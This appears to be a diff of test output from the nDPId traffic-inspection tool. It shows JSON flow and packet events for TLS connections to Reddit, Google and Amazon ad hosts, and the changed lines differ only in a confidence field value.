00610{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7094,"source":"reddit.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291689408,"flow_last_seen":1605291689408,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291689408,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56640,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7094,"source":"reddit.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1605291689408,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291689408,"pkt":"qtsDr8lk5EKm5WPyht1gCYSFACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3UABuxOPoYYAAAAAoAL9IMRnAAACBAWgBAIICql08xMAAAAAAQMDBw=="} 00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7110,"source":"reddit.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":2,"flow_last_seen":1605291689433,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291689433,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvdQHZ86cETj6GHoBJXgAFCAAACBAV4AQMDAwQCCArC10XLqXTzEw=="} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7111,"source":"reddit.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":3,"flow_last_seen":1605291689433,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291689433,"pkt":"qtsDr8lk5EKm5WPyht1gCYSFACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3UABuxOPoYd2fOnCgBAB+4U5AAABAQgKqXTzLcLXRcs="} 
-00951{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7112,"source":"reddit.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291689408,"flow_last_seen":1605291689434,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291689434,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56640,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gateway.reddit.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01007{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8671,"source":"reddit.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291689408,"flow_last_seen":1605291689577,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1605291689577,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56640,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gateway.reddit.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-01277{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8678,"source":"reddit.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1605291689408,"flow_last_seen":1605291689578,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":366,"midstream":0,"thread_ts_msec":1605291689578,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56640,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gateway.reddit.com","server_names":"reddit.com,*.reddit.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.reddit.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"DB:E9:D5:FE:EB:EF:68:34:55:FD:62:BA:C9:BB:04:D4:E3:22:18:81"}} +00951{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7112,"source":"reddit.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291689408,"flow_last_seen":1605291689434,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291689434,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56640,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"gateway.reddit.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01007{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8671,"source":"reddit.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291689408,"flow_last_seen":1605291689577,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1605291689577,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56640,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gateway.reddit.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01277{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8678,"source":"reddit.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1605291689408,"flow_last_seen":1605291689578,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":366,"midstream":0,"thread_ts_msec":1605291689578,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56640,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"gateway.reddit.com","server_names":"reddit.com,*.reddit.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.reddit.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"DB:E9:D5:FE:EB:EF:68:34:55:FD:62:BA:C9:BB:04:D4:E3:22:18:81"}} 00616{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9080,"source":"reddit.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291690373,"flow_last_seen":1605291690373,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291690373,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2002","src_port":51006,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9080,"source":"reddit.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1605291690373,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690373,"pkt":"qtsDr8lk5EKm5WPyht1gB68TACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIBQAAAAAAACACxz4Buz6Su2UAAAAAoAL9IFr7AAACBAWgBAIIClRf7UgAAAAAAQMDBw=="} 
00616{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9081,"source":"reddit.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291690384,"flow_last_seen":1605291690384,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291690384,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::2002","src_port":59336,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9081,"source":"reddit.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":1605291690384,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690384,"pkt":"qtsDr8lk5EKm5WPyht1gCvtsACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICwAAAAAAACAC58gBu5uynDEAAAAAoAL9IAqWAAACBAWgBAIICgxmJysAAAAAAQMDBw=="} 00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9082,"source":"reddit.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":2,"flow_last_seen":1605291690396,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690396,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgFAAAAAAAAIAIqAcsBIEmLB5kd7IUo3\/YpAbvHPls7Xl4+krtmoBJXgDq4AAACBAV4AQMDAwQCCArC10mNVF\/tSA=="} 
00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9083,"source":"reddit.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":3,"flow_last_seen":1605291690396,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291690396,"pkt":"qtsDr8lk5EKm5WPyht1gB68TACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIBQAAAAAAACACxz4Buz6Su2ZbO15fgBAB+76yAAABAQgKVF\/tX8LXSY0="} -00955{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9084,"source":"reddit.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690373,"flow_last_seen":1605291690396,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291690396,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2002","src_port":51006,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"adservice.google.fr","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00955{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9084,"source":"reddit.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690373,"flow_last_seen":1605291690396,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291690396,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2002","src_port":51006,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"adservice.google.fr","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9086,"source":"reddit.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":2,"flow_last_seen":1605291690402,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690402,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgLAAAAAAAAIAIqAcsBIEmLB5kd7IUo3\/YpAbvnyP\/5OOmbspwyoBJXgGsCAAACBAV4AQMDAwQCCArC10mUDGYnKw=="} 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9087,"source":"reddit.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":3,"flow_last_seen":1605291690402,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291690402,"pkt":"qtsDr8lk5EKm5WPyht1gCvtsACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICwAAAAAAACAC58gBu5uynDL\/+TjqgBAB++8BAAABAQgKDGYnPcLXSZQ="} 
-00956{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9088,"source":"reddit.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690384,"flow_last_seen":1605291690403,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291690403,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::2002","src_port":59336,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"adservice.google.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00956{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9088,"source":"reddit.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690384,"flow_last_seen":1605291690403,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291690403,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::2002","src_port":59336,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"adservice.google.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
00610{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9089,"source":"reddit.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291690405,"flow_last_seen":1605291690405,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291690405,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::345f:7ca5","src_port":46646,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9089,"source":"reddit.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1605291690405,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690405,"pkt":"qtsDr8lk5EKm5WPyht1gBYjGACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAAA0X3yltjYBu5sO15YAAAAAoAL9IOjCAAACBAWgBAIICgKUPwEAAAAAAQMDBw=="} 00616{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9090,"source":"reddit.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291690421,"flow_last_seen":1605291690421,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291690421,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::2001","src_port":59624,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9090,"source":"reddit.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":1,"flow_last_seen":1605291690421,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690421,"pkt":"qtsDr8lk5EKm5WPyht1gBJW4ACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICwAAAAAAACAB6OgBu5zTDYMAAAAAoAL9IIEIAAACBAWgBAIICl8E6ogAAAAAAQMDBw=="} 00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9093,"source":"reddit.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":2,"flow_last_seen":1605291690440,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690440,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAADRffKUqAcsBIEmLB5kd7IUo3\/YpAbu2Nv\/zx++bDteXoBJXgLoLAAACBAV4AQMDAwQCCArC10m3ApQ\/AQ=="} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9094,"source":"reddit.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":3,"flow_last_seen":1605291690440,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291690440,"pkt":"qtsDr8lk5EKm5WPyht1gBYjGACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAAA0X3yltjYBu5sO15f\/88fwgBAB+z36AAABAQgKApQ\/JMLXSbc="} 
-00956{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9095,"source":"reddit.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690405,"flow_last_seen":1605291690440,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291690440,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::345f:7ca5","src_port":46646,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"aax-eu.amazon-adsystem.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00996{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9096,"source":"reddit.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690373,"flow_last_seen":1605291690448,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291690448,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2002","src_port":51006,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"adservice.google.fr","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00956{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9095,"source":"reddit.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690405,"flow_last_seen":1605291690440,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291690440,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::345f:7ca5","src_port":46646,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"aax-eu.amazon-adsystem.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00996{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9096,"source":"reddit.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690373,"flow_last_seen":1605291690448,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291690448,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2002","src_port":51006,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"adservice.google.fr","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9098,"source":"reddit.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":2,"flow_last_seen":1605291690449,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690449,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgLAAAAAAAAIAEqAcsBIEmLB5kd7IUo3\/YpAbvo6PvOtUOc0w2EoBJXgGkiAAACBAV4AQMDAwQCCArC10m3XwTqiA=="} -00997{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9099,"source":"reddit.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690384,"flow_last_seen":1605291690449,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291690449,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::2002","src_port":59336,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"adservice.google.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 